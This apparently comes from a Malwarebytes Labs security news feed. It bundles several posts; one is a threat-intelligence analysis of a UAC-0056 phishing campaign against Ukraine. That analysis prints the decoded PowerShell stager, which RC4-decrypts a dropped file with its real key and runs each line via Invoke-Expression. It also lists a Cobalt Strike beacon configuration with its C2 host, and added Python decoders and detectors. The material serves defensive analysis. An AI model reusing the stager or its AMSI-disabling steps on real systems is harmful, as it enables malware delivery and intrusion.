IT NEWS

WhatsApp warns users: Fake versions of WhatsApp are trying to steal your personal info

WhatsApp boss Will Cathcart is warning users of the popular messaging app to be on their guard after the WhatsApp Security Team discovered bogus apps packing a hidden punch in the form of malware.

Outside the safety of the walled garden

App stores do whatever they can to try and prevent bogus programs making it onto the storefront. While the majority of apps on legitimate stores are likely safe, rogues do get through. To avoid the hassle of dodging safety checks, malware authors host their infected files elsewhere. If they can draw device owners outside the relative safety of a storefront, they have more scope for infecting a mobile.

Sure enough:

There’s no detailed rundown of what the fake WhatsApp versions were getting up to on devices. What Cathcart does say is that these programs promised new features, but were specifically designed to steal personal information stored on victims’ phones.

Google Play Protect on Android now detects and disables previously downloaded versions of the fake WhatsApp apps, and the Google Play store shouldn’t experience any threat from these apps.

This is great news for those inside the walled garden, but what about those sitting outside?

(Un)official store safety

Depending on which version of Android you run, the settings and options available likely differ from model to model. However, in settings there’s usually an option which asks if you wish to download or install files from unknown sources.

What this means is “Do you want to install apps from outside the Google Play store”. This isn’t quite as nefarious as it sounds. Mobile networks and other organisations often offer downloadable software as part of their phone contracts. However, these app downloads may be offered outside of the Play Store. This is where the unknown source option comes into play.

A lot of the time, downloading these files outside of the store isn’t needed. The apps offered directly from organisations can be found on the Play Store anyway, in identical format. So it’s best to only download apps from the Play Store if at all possible.

WhatsApp: accept no imitations

WhatsApp recommends you only download the app from official stores. You can find links for both Android and iPhone on the official download page. WhatsApp has been known to hand users temporary bans if it finds evidence of people using unsupported versions on their devices. If you’re using a listed unsupported app, which is an altered version of the original, you’ll receive a temporary ban for that too.

It seems that the safest and most straightforward course of action is to avoid unofficial downloads, and follow WhatsApp’s advice for responsible app use.

The post WhatsApp warns users: Fake versions of WhatsApp are trying to steal your personal info appeared first on Malwarebytes Labs.

Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign

This blog was authored by Roberto Santos and Hossein Jazi

The Malwarebytes Threat Intelligence team recently reviewed a series of cyber attacks against Ukraine that we attribute with high confidence to UAC-0056 (AKA UNC2589, TA471). This threat group has repeatedly targeted government entities in Ukraine via phishing campaigns following the same common tactics, techniques and procedures (TTPs).

Lures are based on important matters related to the ongoing war and humanitarian disaster happening in Ukraine. We have been closely monitoring this threat actor and noticed changes in their macro-based documents as well as their final payloads.

In this blog, we will connect the dots between different decoy samples that we and others such as Ukraine CERT have observed. We will also share indicators for a previously undocumented campaign performed by the same threat actor at the end of June.

Different themes, same techniques

Since the publication of our blog post There’s a Go Elephant in the room, we have tracked several new samples as can be seen in the timeline below:

Figure 1: Relations between different UAC-0056 attributed samples

Let’s dig further into those relationships. UA-CERT has attributed the document named “Information on the availability of vacancies and their staffing.xls” to UAC-0056. This file looked familiar to us and for good reason because the macro is nearly identical to the document we analyzed in our initial blog:

Figure 2: Detail of Vacancies and GoElephant dropper macros

In the most recent attack reported by UA-CERT (Humanitarian catastrophe of Ukraine since February 24, 2022.xls) we see an almost identical macro to the one used in another decoy document called Help Ukraine.xls:

Figure 3: Detail of Help Ukraine and Humanitarian catastrophe macros

The Help Ukraine lure, to our knowledge, has never been publicly documented before:

Figure 4: Help Ukraine lure used in late July

We were able to identify 7 different samples with that theme, including one (258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0) that has some similarities with a previous attack:

Figure 5: Similarities between different versions

Also, in the past we have found comments referring to a domain named ExcelVBA[.]ru. This document was contacting a suspiciously similar domain named excel-vba[.]ru.

Figure 6: Similarities between different versions (2)

Among victims, we find gov.ua emails being targeted. One of the texts used as email body in the last campaign was written in Ukrainian and translates to:

On February 24, 2022, the army of the terrorist state – the Russian Federation, intervened on the territory of Ukraine. In order to counter the propaganda of the Russian government, the State Department of Statistics at the Office of the President of Ukraine prepared a consolidated report on the dead citizens of Ukraine, on the citizens of Ukraine who were left without a home, on the citizens of Ukraine who lost their jobs, on the number of destroyed homes, on the number of destroyed businesses as a result of an act of aggression. This report shows all the data broken down by regions of Ukraine. Familiarize yourself and familiarize your colleagues with the real state of affairs. Glory to Ukraine!

Translation of original email sent to victims

We will focus our analysis on these 3 newer templates. Exact names and paths are taken from 024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1 (Information on the availability of vacancies and their staffing.xls). The analysis still holds for the other samples, although minor differences exist between them.

write.bin

The document will download an executable file named write.bin. Other attacks following the same scheme used different names for this file, including Office.exe, baseupd.exe and DataSource.exe. The file is slightly obfuscated, and performs the following actions:

Establishing persistence

After some anti-debugging tricks, the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Check License is used to establish persistence. HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Update Checker is checked first, because that was the key used by previous versions of the malware.

Figure 7: Run key for persistence

Dropping next stage

The next step is dropping a file at C:\ProgramData\TRYxaEbX. This file is used later.

Figure 8: Powershell commandline shown in IDA Pro

The payload then executes the following Base64-encoded PowerShell command:


Figure 9: Write executable creating the previous detailed powershell command

The command above is Base64 encoded and decodes to:

# Read the blob dropped at C:\ProgramData\TRYxaEbX
$A1 = [System.IO.File]::ReadAllBytes("C:\ProgramData\TRYxaEbX");
# RC4 key bytes. The captured command does not show this assignment; the key value is the one stated in the text below.
$B1 = [System.Text.Encoding]::ASCII.GetBytes("CmAJngvdDmiTjLxN");
# RC4 as a scriptblock: key-scheduling loop over 0..255, then keystream generation XORed with every input byte
$A={$W,$Y=$Args;$X=0..255;0..255|%{$Z=($Z+$X[$_]+$Y[$_%$Y.Length])%256;$X[$_],$X[$Z]=$X[$Z],$X[$_]};$W|%{$U=($U+1)%256;$V=($V+$X[$U])%256;$X[$U],$X[$V]=$X[$V],$X[$U];$_-bxor$X[($X[$U]+$X[$V])%256]}};
# Decrypt the blob with the key
$C = (& $A $A1 $B1);
# Decode the plaintext as UTF-8, split it into lines and run each line with Invoke-Expression
$E = (New-Object -TypeName System.Text.UTF8Encoding).GetString($C,0,$C.Length);
$E = $E -Split [Environment]::NewLine;
foreach($EE in $E){iex $($EE+";");};

In short, the file dropped at C:\ProgramData\TRYxaEbX is decrypted with RC4 using CmAJngvdDmiTjLxN as the key, and every line of the result is passed to Invoke-Expression. The resulting PowerShell script looks like this:
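To reproduce this decryption offline, the following Python reimplements the RC4 routine from the PowerShell scriptblock above (an added example, not code from the campaign or from the authors). It uses the key stated in the text; the encrypted sample blob is constructed here, since the contents of the real dropped file are not on the page.

```python
"""Offline RC4 decryption of the dropped stage, mirroring the PowerShell stager."""

# RC4 key quoted in the write-up for the C:\ProgramData\TRYxaEbX blob.
PAGE_KEY = b"CmAJngvdDmiTjLxN"


def rc4(data: bytes, key: bytes) -> bytes:
    """RC4 exactly as the stager's scriptblock implements it.

    Key scheduling: $Z=($Z+$X[$_]+$Y[$_%$Y.Length])%256, then swap X[i] and X[Z].
    Keystream:      $U=($U+1)%256; $V=($V+$X[$U])%256; swap; xor with X[(X[U]+X[V])%256].
    RC4 is symmetric, so the same call encrypts and decrypts.
    """
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def decode_stage(blob: bytes, key: bytes = PAGE_KEY) -> list[str]:
    """Do what the stager does up to, but not including, 'iex': decrypt, decode as
    UTF-8 and split on line breaks. The lines are returned for reading, never run."""
    text = rc4(blob, key).decode("utf-8")
    # [Environment]::NewLine is CRLF on Windows; tolerate bare LF as well.
    return [line for line in text.replace("\r\n", "\n").split("\n") if line.strip()]


def decode_stage_file(path: str, key: bytes = PAGE_KEY) -> list[str]:
    """Decode a captured copy of the dropped file from disk."""
    with open(path, "rb") as fh:
        return decode_stage(fh.read(), key)


# Constructed stand-in for the dropped file: a harmless two-line script encrypted
# with the page's key. The real TRYxaEbX contents are not reproduced on the page.
SAMPLE_STAGE = "Write-Output 'stage two'\r\n$x = 1 + 1\r\n"
SAMPLE_BLOB = rc4(SAMPLE_STAGE.encode("utf-8"), PAGE_KEY)

if __name__ == "__main__":
    for line in decode_stage(SAMPLE_BLOB):
        print(line)
```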

Figure 10: Decoded PowerShell stage

Here we can see some of the actions that will be taken:

  • Disable script logging
  • Disable Module Logging
  • Disable Transcription
  • Disable AMSI protection

After this step, another Base64 payload is decoded and executed:

Figure 11: Final PowerShell script

Cobalt Strike payload deployed

As can be seen, the main functionality of this second PowerShell file is to inject shellcode. The shellcode can be 32- or 64-bit, and is a Cobalt Strike beacon with the following configuration:

BeaconType     - HTTPS
Port           - 443
SleepTime      - 30000
PublicKey_MD5  - defb5d95ce99e1ebbf421a1a38d9cb64
C2Server       - skreatortemp.site,/s/08u1XdxChhMrLYdTasfnOMQpbsLkpq3o/field-keywords/
UserAgent      - Mozilla/5.0_Frsg_stredf_o21_rutyyyrui_type (Windows NT 10.0; Win64; x64; Trident/7.0; D-M1-200309AC;D-M1-MSSP1; rv:11.0) like Gecko_10984gap
HttpPostUri    - /nBz07hg5l3C9wuWVCGV-5xHHu1amjf76F2A8i/avp/amznussraps/
Watermark      - 1580103824

By having a Cobalt Strike instance running on the victim’s machine, it is now fully compromised.
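The beacon configuration above gives a defender three network artefacts to hunt for: the C2 host, the GET and POST URIs, and the mangled User-Agent. The following Python (an added example, not the authors' tooling) parses a config dump in that format and runs the resulting matches over proxy log lines; the log format and the sample lines are constructed.

```python
"""Turn the beacon configuration above into proxy-log detection logic."""
import re
from urllib.parse import urlsplit

# Beacon configuration fields as dumped in the write-up (values verbatim).
BEACON_CONFIG = """
BeaconType    - HTTPS
Port          - 443
C2Server      - skreatortemp.site,/s/08u1XdxChhMrLYdTasfnOMQpbsLkpq3o/field-keywords/
UserAgent     - Mozilla/5.0_Frsg_stredf_o21_rutyyyrui_type (Windows NT 10.0; Win64; x64; Trident/7.0; D-M1-200309AC;D-M1-MSSP1; rv:11.0) like Gecko_10984gap
HttpPostUri   - /nBz07hg5l3C9wuWVCGV-5xHHu1amjf76F2A8i/avp/amznussraps/
Watermark     - 1580103824
"""

# Accept both an ASCII hyphen and the en dash some dumps use as the separator.
_CONFIG_LINE = re.compile(r"^\s*(\w+)\s+[-–]\s+(.*\S)\s*$")


def parse_beacon_config(text: str) -> dict[str, str]:
    """Parse 'Field - value' lines of a Cobalt Strike config dump into a dict."""
    cfg: dict[str, str] = {}
    for line in text.splitlines():
        m = _CONFIG_LINE.match(line)
        if m:
            cfg[m.group(1)] = m.group(2)
    return cfg


def indicators(cfg: dict[str, str]) -> dict:
    """Collect the network artefacts worth matching on: the C2 host, the GET URI
    that follows the comma in C2Server, the POST URI, and the exact User-Agent."""
    host, _, get_uri = cfg["C2Server"].partition(",")
    return {
        "host": host.strip().lower(),
        "uris": {get_uri.strip(), cfg["HttpPostUri"].strip()},
        "user_agent": cfg["UserAgent"],
    }


# Genuine browser and Trident User-Agents begin "Mozilla/5.0 (": a product token
# that runs straight into underscores, as this beacon's does, is a malleable-profile
# artefact and worth a detection of its own, independent of host or URI.
_WELL_FORMED_UA = re.compile(r"^Mozilla/5\.0 \(")


def ua_is_malformed(ua: str) -> bool:
    return ua.startswith("Mozilla/5.0") and not _WELL_FORMED_UA.match(ua)


# Constructed proxy log format (not from the page):
#   <timestamp> <client-ip> <method> <url> <status> "<user-agent>"
_LOG_LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "(.*)"$')


def classify_line(line: str, ioc: dict) -> list[str]:
    """Return the reasons a proxy log line matches this beacon (empty if clean)."""
    m = _LOG_LINE.match(line)
    if not m:
        return ["unparsed"]
    url, ua = m.group(4), m.group(6)
    parts = urlsplit(url)
    reasons = []
    if (parts.hostname or "").lower() == ioc["host"]:
        reasons.append("c2-host")
    if parts.path in ioc["uris"]:
        reasons.append("c2-uri")
    if ua == ioc["user_agent"]:
        reasons.append("c2-user-agent")
    elif ua_is_malformed(ua):
        reasons.append("malformed-user-agent")
    return reasons


def scan(lines: list[str], ioc: dict) -> list[tuple[int, list[str]]]:
    """Return (line index, reasons) for every line that matched something."""
    hits = []
    for idx, line in enumerate(lines):
        reasons = classify_line(line, ioc)
        if reasons:
            hits.append((idx, reasons))
    return hits


IOC = indicators(parse_beacon_config(BEACON_CONFIG))

# Constructed sample traffic: two beacon check-ins, one normal browser request, and
# a request to an unrelated host using a similarly mangled User-Agent.
SAMPLE_LOG = [
    f'2022-07-05T09:12:01Z 10.0.0.12 GET https://skreatortemp.site/s/08u1XdxChhMrLYdTasfnOMQpbsLkpq3o/field-keywords/ 200 "{IOC["user_agent"]}"',
    f'2022-07-05T09:12:31Z 10.0.0.12 POST https://skreatortemp.site/nBz07hg5l3C9wuWVCGV-5xHHu1amjf76F2A8i/avp/amznussraps/ 200 "{IOC["user_agent"]}"',
    '2022-07-05T09:13:00Z 10.0.0.20 GET https://www.example.com/index.html 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"',
    '2022-07-05T09:14:10Z 10.0.0.33 GET https://cdn.example.net/update 200 "Mozilla/5.0_Frsg_stredf_o21 (Windows NT 10.0; Win64; x64) like Gecko_x"',
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_LOG, IOC):
        print(idx, ", ".join(reasons))
```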

Attacker probes the sandbox

At the time of writing, malicious C&C servers seem to be down. However, on July 5 we saw active servers and successful connections to our test environment. The attackers actively sent reconnaissance commands to the machine, listing the content of several folders.

We were able to decode the network communications using Didier Stevens’ excellent collection of Cobalt Strike tools.

Figure 12: Cobalt Strike communication decoded

We consider these actions preliminary moves to check whether the machine is a viable target or not before following up with other actions.

Attribution to UAC-0056

Based on recent attacks reported by CERT UA, as well as the similarities indicated at the beginning of the blog, we can attribute this attack with high confidence to UAC-0056.

Signatures contained in the Cobalt Strike beacons (watermark 1580103824 and public key MD5 defb5d95ce99e1ebbf421a1a38d9cb64) could be used to connect the attack to other groups. For instance, the public key should be unique per deployment, according to the Cobalt Strike documentation.

However, in this case we cannot simply rely on the public key to attribute the sample analyzed in this report: these same signatures have been attributed to many different groups. Our assessment is that the group used a leaked version of Cobalt Strike and therefore shares its private key with other actors, which makes attribution harder.

Malwarebytes users were protected against this campaign thanks to our Anti-Exploit layer.


IOCs

Malicious Excel documents (Help Ukraine template)


Malicious Excel documents (Humanitarian template)

024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1
14736be09a7652d206cd6ab35375116ec4fad499bb1b47567e4fd56dcfcd22ea
474a0f0bb5b17a1bb024e08a0bb46277ba03392ee95766870c981658c4c2300d

Payloads


Cobalt Strike beacon and payloads


The post Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign appeared first on Malwarebytes Labs.

Insecure password leads to Mangatoon data breach

The hugely popular Manga comics platform Mangatoon has fallen victim to a data breach. No fewer than 23 million user accounts could be at risk, thanks to a poorly secured database. Worse still, Mangatoon doesn’t seem to be responding to messages from the breacher, or people notifying it that the breach has taken place.

A limited edition run of exposed accounts

Mangatoon allows comics fans to read a variety of web comics for free via the app, with the option to “unlock” whole comics for a fee. Unfortunately for Mangatoon, its Elasticsearch database was compromised leading to several attempts to get its attention.

No response was forthcoming by email or even social media. While it’s possible everyone involved is too busy fixing the problem, the complete lack of a reply is concerning.

Checking for exposure

The data from the breach, which occurred in May, has been loaded into the popular breach checking service Have I Been Pwned.

You can search for your email address on that site, and if your mail is tied to any data breaches (not just Mangatoon), the site will let you know which sites, what data, and when it was breached.

Password disasters of our time

The 23 million or so accounts were exposed purely because of bad password management. All of this data was, incredibly, sitting behind the password “password”.

Mangatoon changed the password after the system breacher notified it. However, no customers have been notified and anyone unaware would think everything is currently business as usual. The truth is that things couldn’t be further from the case. Are there other, similarly poorly secured databases? Has the password been changed to something that isn’t “password123”?

Elasticsearch makes use of a variety of security features for all manner of configurations, so will Mangatoon be making use of these in future?

So many unanswered questions in a situation such as this isn’t massively reassuring.

Lock down your databases

Poorly secured Elasticsearch databases are juicy targets for those up to no good. At least 450 ransom notes were discovered demanding payment in return for files found on Elasticsearch databases back in June of this year. Sadly for anyone paying up to recover the stolen files, there’s a good chance the attackers had already deleted them. This is, of course, a valuable reminder to back up your data.

This is especially true considering Elasticsearch sits alongside both Redis and MongoDB as some of 2022’s top exposed databases.

If you use Mangatoon you should change your password to your account now. If you’ve used the same username and password combination on other accounts, you should change those too.

The post Insecure password leads to Mangatoon data breach appeared first on Malwarebytes Labs.

PyPI starts rolling out required 2FA for important projects

The Python Package Index (PyPI) says it has begun rolling out a two-factor authentication (2FA) requirement which obliges maintainers of critical projects to have 2FA enabled in order to publish, update, or modify them. PyPI plays an important role in the Python developers’ ecosystem.

Python repository

PyPI is the repository of software for the Python programming language. Python is a high-level, interpreted, general-purpose programming language, and a very popular one, often used on servers to create web applications.

Many web developers, and others, use Python packages or add-on libraries from other developers as building blocks to develop their own projects. The Python Software Foundation (PSF) manages the PyPI repository where Python developers can get third-party developed open-source packages for their projects.

Critical projects

The projects rated as critical by the PSF are those that are in the top 1% of downloads. Maintainers of such projects should have received an email about the new requirement. The requirement will go into effect in the coming months. Based on the 1% rule, over 3,500 projects have received the critical designation.

The good news is that every project has the option to set 2FA as required. And, to ensure that maintainers of critical projects have the ability to implement strong 2FA with security keys, the Google Open Source Security Team has provided a limited number of security keys to distribute among critical project maintainers.

The reason

As you can imagine, unauthorized access to a project that many others depend on opens up the possibility of a software supply chain attack. So, requiring 2FA for critical projects decreases the chance that someone could introduce malicious code into a popular project.

We have all seen the problems with Log4j. For those that missed it, Log4j is an open source logging library written in Java developed by the Apache Software Foundation. Millions of applications use it, and some of them are enormously popular, so the potential reach of this problem turned out to be enormous.

A related problem that remains unresolved by these new requirements is the use of packages purposely named after popular projects to trick users into downloading a malicious version.

Mixed feelings

As you would expect on Twitter, there are mixed feelings among those affected by the new requirement, ranging from developers saying goodbye to their popular projects to those wondering why 2FA wasn’t already mandatory in the first place.

For all those with unanswered questions, PyPI has put up a FAQ about the 2FA implementation, along with the key giveaway.

The post PyPI starts rolling out required 2FA for important projects appeared first on Malwarebytes Labs.

Fake streamed cricket matches knocks victims for six

An incredible scam which resembles hidden camera prank shows has been shut down by police. Four men were arrested last week in connection with the con-job involving fake cricket and online betting. It begins in Russia, takes a trip to India, and ends up back in Russia. Here’s how it unfolded:

Setting the stage

People living in India who are interested in betting on sports tend to gravitate online. One of the men allegedly involved in this scam had previously worked in a bar in Russia. He’d convinced his contacts there to show interest in cricket betting, which turned out to be the starting point for all of the below.

Our intrepid bar worker returned to India, and what followed is an amazing exercise in online deception, offline activities, fictional visions of reality, and at least 20 people playing roles day in and day out.

Before we get to the real world shenanigans, let’s take a look at the YouTube angle.

The YouTube cricket carnival

The fake cricket matches were all tied to one YouTube channel called Century Hitters T20. At the time of writing, the channel is still live, and we suspect it will be kept that way while investigations proceed. It has racked up 809 subscribers and 49k views across 47 videos since it was created roughly a month ago.

It’s not possible to embed any of the streams, because the account creators have disabled that feature. Apart from the absolutely awful cricket pitch, a lot of effort has gone into lighting, visuals, camera equipment, screen graphics, even the various cricket team outfits. This leads us neatly on to the real-world component of this large scale fake out.

Fake it till you make it

This isn’t some small time operation with a fake office in a basement somewhere. The people behind this thought big and stuck to their goal. A small village was used as the staging area for the scam. According to reports, “nearly two dozen locals” were paid to act as cricket teams, umpires, and organisers. One person even imitated a well-known cricket commentator.

Players were paid $5 per game. Fake umpires used walkie-talkies to talk to organisers, and directed the shape of each supposed cricket match. The organisers would converse with people making bets via Telegram.

To simulate the roar of the cricket-loving crowds, running commentaries complete with cheering were piped through speakers close to the cricket ground. And by cricket ground, I mean “muddy mess with a bit of grass poking up through the soil”.

They presumably picked their Russian marks well. Nobody even vaguely familiar with professional cricket would believe that real players would grace that monstrosity with their presence. There’s no mention of losses incurred by those the scammers preyed on. For now all we can do is wait and watch how this one plays out in court. Hopefully with fewer fake crowd recordings.

The post Fake streamed cricket matches knocks victims for six appeared first on Malwarebytes Labs.

Europe threatens to ban Facebook over data transfers to the US

If regulators have their way, data transfers from Facebook and Instagram between Europe and the United States could stop this summer. (WhatsApp, another Meta service, will not be affected by the decision as it has a different data controller within Meta.) This could force Meta, Facebook’s parent company, to undergo some radical changes with the way it handles data from Europe, such as setting up local data centers. Otherwise, it will have no choice but to pull out of Europe.

The Irish Data Protection Commission (DPC) sent a draft of its final decision on Thursday to its European counterparts regarding banning Meta from receiving user data from Europe.

A Meta spokesperson told the Telegraph, “This draft decision, which is subject to review by European Data Protection Authorities, relates to a conflict of EU and US law which is in the process of being resolved.”

“We welcome the EU-US agreement for a new legal framework that will allow the continued transfer of data across borders, and we expect this framework will allow us to keep families, communities and economies connected.”

Ireland is the country overseeing Facebook’s data practices as it is Facebook’s legal headquarters in Europe. Any ruling in Ireland would apply to all of Europe.

In 2020, the Court of Justice of the European Union (CJEU) struck down the EU-US Privacy Shield, a legal framework regulating the transatlantic transfer of European data to the US, ruling it invalid because it failed to protect European personal data from US surveillance. This ruling is commonly known as the Schrems II case.

However, data from the EU to the US continues to flow. While the CJEU annulled Privacy Shield, it also confirmed the legitimacy of the Standard Contractual Clauses (SCCs), which Facebook (and other US businesses) have used as an alternative legal basis for transferring data from the EU to the US. Should the regulators’ decision become final, Meta will be forced to stop relying on the SCCs as well.

“Suspending data transfers would be damaging not only to the millions of people, charities and businesses in the EU who use our services, but also to thousands of other companies who rely on EU-US data transfers to provide a global service,” a Meta spokesperson told SiliconRepublic.com. “A long-term solution on EU-US data transfers is needed to keep people, businesses and economies connected.”

In an interview with The Telegraph, Max Schrems, the privacy campaigner responsible for Privacy Shield getting binned, expected Facebook to use the Irish legal system to delay the implementation of the data transfer ban. He also added that Irish police would need to “physically cut the cords before these transfers actually stop”.

The post Europe threatens to ban Facebook over data transfers to the US appeared first on Malwarebytes Labs.

A week in security (July 4 – July 10)

Last week on Malwarebytes Labs:

Stay safe!

The post A week in security (July 4 – July 10) appeared first on Malwarebytes Labs.

Microsoft appears to be rolling back Office Macro blocking

We’re seeing several reports indicating that Microsoft may have rolled back its decision to block Macros in Office. Currently no official statement exists—the reports rely on a post by a Microsoft employee in the replies of the original article where the plan to block macros was announced.

Earlier this year, Microsoft decided to disable macros downloaded from the Internet in five Office apps, by default. Users trying to open files downloaded from the Internet that contained macros would see a message, with a link to an article explaining the block.

SECURITY RISK: Microsoft has blocked macros from running because the source of this file is untrusted

Malicious macros have been popular with criminals for more than three decades, and the step was welcomed by the security community. However, some users of Microsoft products have queried a surprising change. Dangerous files downloaded from the internet are not being treated as expected in Office.

The shifting sands of macro blocking

Bizarrely, the reprieve from macro worries lasted only a few months, as people are now discovering. A recent comment on the article describing the block reports that macro blocking has been removed in the Office Current Channel:

Is it just me or have Microsoft rolled this change back on the Current Channel?

I was trying to reproduce the pinkish-red ‘Security Risk… Learn More’ notification in the Message Bar, in preparation for demonstrating the new default behaviour for a YouTube video I’m putting together about my company’s macro-enabled toolkit.

Created a simple .xlsm to show a MsgBox in the open event of the workbook, saved it and uploaded it to cloud storage, deleted it from my local storage, re-downloaded it from cloud storage (to a non-trusted location, my Downloads library)… did not use the Unblock checkbox on the Properties dialog to remove the mark of the web… then opened up the file.

It first went into Protected View (expected behaviour), but then after I clicked Enable Editing, instead of getting the pink/red message about macros being blocked altogether, I just got the old ‘Security warning…’ message with the ‘Enable Content’ button. The file’s VBA project wasn’t digitally signed, wasn’t saved to a Trusted Location, and still had the mark of the web on it… so macros should have been blocked.

A response came from someone called Angela Robertson, billed as “A Microsoft employee on the Microsoft Tech Community”:

Based on feedback received, a rollback has started. An update about the rollback is in progress. I apologize for any inconvenience of the rollback starting before the update about the change was made available.
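To make the rule the commenter tested concrete, here is a small Python model of the macro decision flow (an added example, not Microsoft’s code): it reads a file’s Zone.Identifier stream to detect the mark of the web and returns which Message Bar the file would get. The sample stream and its hostname are constructed, and internet_block_enabled is a hypothetical switch that models the rollback.

```python
"""Model of the macro-handling decision the comment above walks through."""
from dataclasses import dataclass
from typing import Optional

# Windows URL security zones that carry the mark of the web.
URLZONE_INTERNET = 3
URLZONE_UNTRUSTED = 4


def parse_zone_identifier(stream: str) -> Optional[int]:
    """Return ZoneId from the text of a file's Zone.Identifier alternate data
    stream (INI-style: a [ZoneTransfer] section with ZoneId=<n>), or None."""
    section = None
    for raw in stream.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        key, sep, value = line.partition("=")
        if section == "zonetransfer" and sep and key.strip().lower() == "zoneid":
            try:
                return int(value.strip())
            except ValueError:
                return None
    return None


@dataclass
class OfficeFile:
    zone_identifier: Optional[str]   # Zone.Identifier stream text; None if the file has none
    in_trusted_location: bool
    signed_by_trusted_publisher: bool


def macro_decision(f: OfficeFile, internet_block_enabled: bool = True) -> str:
    """Return 'run', 'blocked' or 'warning' following the default-block flow:
    trusted location -> run; signed by a trusted publisher -> run; file carries
    the mark of the web -> blocked with the 'SECURITY RISK' bar; otherwise the
    older 'Security Warning' bar with its Enable Content button.
    internet_block_enabled=False models the rolled-back Current Channel."""
    if f.in_trusted_location or f.signed_by_trusted_publisher:
        return "run"
    zone = parse_zone_identifier(f.zone_identifier) if f.zone_identifier else None
    has_motw = zone in (URLZONE_INTERNET, URLZONE_UNTRUSTED)
    if has_motw and internet_block_enabled:
        return "blocked"
    return "warning"


# Constructed Zone.Identifier contents for an unsigned .xlsm downloaded from the
# internet to a non-trusted location, as in the commenter's experiment.
DOWNLOADED_XLSM = OfficeFile(
    zone_identifier="[ZoneTransfer]\r\nZoneId=3\r\nHostUrl=https://storage.example.invalid/toolkit.xlsm\r\n",
    in_trusted_location=False,
    signed_by_trusted_publisher=False,
)

if __name__ == "__main__":
    print("new default:", macro_decision(DOWNLOADED_XLSM))                               # blocked
    print("rolled back:", macro_decision(DOWNLOADED_XLSM, internet_block_enabled=False))  # warning
```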

Waiting for more information

At the time of writing, we can’t say what this community feedback is or why it’s been so influential in triggering the apparent decision to disable macro blocking. The response in security circles is somewhat less than enthusiastic, and there’s no new information outside of waiting to see what’s contained in the promised “update”.

Indeed, all we have currently is a second Microsoft post which confirms the rollback:

…based on feedback, we’re rolling back this change from Current Channel production. We appreciate the feedback we’ve received so far, and we’re working to make improvements in this experience. We’ll provide another update when we’re ready to release again to Current Channel. Thank you.

We will update this article as soon as Microsoft clarifies what exactly is going on.

The post Microsoft appears to be rolling back Office Macro blocking appeared first on Malwarebytes Labs.

North Korean APT targets US healthcare sector with Maui ransomware

State-sponsored North Korean threat actors have been targeting the US Healthcare and Public Health (HPH) sector for the past year using the Maui ransomware, according to a joint cybersecurity advisory (CSA) from the FBI, Cybersecurity and Infrastructure Security Agency (CISA), and the Department of the Treasury.

CISA Director Jen Easterly also announced the CSA on Twitter.

The FBI started responding to incidents involving Maui in May 2021. This ransomware, which threat intelligence firm Stairwell first profiled, is relatively new.

North Korean state-sponsored cyber-actors used Maui ransomware in these incidents to encrypt servers responsible for healthcare services—including electronic health records services, diagnostics services, imaging services, and intranet services. In some cases, these incidents disrupted the services provided by the targeted HPH Sector organizations for prolonged periods.

– CSA Alert (AA22-187A)

Unlike the ransomware we usually see, which plagues organizations and regularly hits the news, Maui is never sold or offered to affiliates as a ransomware-as-a-service (RaaS) tool. It is, instead, developed and used privately by state-backed actors.

Most notably, attackers operate Maui manually. This is on purpose, so attackers have more control over which files to encrypt when Maui is executed.

“When executed at the command line without any arguments, Maui prints usage information, detailing supported command-line parameters,” Stairwell Principal Research Engineer Silas Cutler wrote in the report. “The only required argument is a folder path, which Maui will parse and encrypt identified files.”

“Embedded usage instructions and the assessed use of a builder is common when there is an operational separation between developers and users of a malware family.”

Maui also has other unusual features—it doesn’t drop a ransom note, and uses a three-layer encryption methodology reminiscent of Conti and ShiOne.

“Instead of relying upon external infrastructure to receive encryption keys, Maui creates three files in the same directory it was executed from containing the results of its execution. These files are likely exfiltrated by Maui operators and processed by private tooling to generate associated decryption tooling,” Cutler said.

The FBI shared the indicators of compromise (IOCs) in its advisory.

Malwarebytes detects Maui ransomware as Ransom.Maui.

Dealing with Maui ransomware

The advisory also provides mitigation steps organizations can take to prepare for, or deal with, attacks using Maui ransomware. Thankfully, although Maui may be a little different from run-of-the-mill ransomware, the steps to protect against it are not:

  • Maintain off-site, offline backups of data and test them regularly.
  • Create a cybersecurity response plan.
  • Keep operating systems, applications, and firmware up to date.
  • Disable or harden remote desktop protocol (RDP).
  • Require multi-factor authentication (MFA) for as many services as possible.
  • Require administrator credentials to install software.
  • Report ransomware incidents to your local FBI field office.

The various agencies involved also made it clear, once again, that they strongly discourage victims from paying ransoms. It does not guarantee you will get your data back, does not free you from recovery costs (because you still have to harden your system against the next attack), and it marks you as a target for repeat attacks.

Stay safe!

The post North Korean APT targets US healthcare sector with Maui ransomware appeared first on Malwarebytes Labs.

4 ways businesses can save money on cyber insurance

So, your business has just suffered a data breach and it’s time to dig deep in your pockets to pay all the resulting expenses. Without cyber insurance, you can expect to pay a dizzying amount of cash.

In 2022 alone, the average cost of a data breach for businesses under 1,000 employees was close to $3 million—and these costs are coming from activities that cyber insurers typically cover, such as detecting and responding to the breach.

Indeed, with liability limits ranging from $1 million to $5 million or more, cyber insurance policies can cover a good chunk of the damage caused by a data breach.

But if you’re looking to apply for cyber insurance, there’s a few things you should know first—especially if you want the lowest possible premium. 

Here are four ways your business can save money on its insurance.

How is cyber insurance priced?

Before we dive in any further, it’s important to understand how cyber insurance policies are priced to begin with.

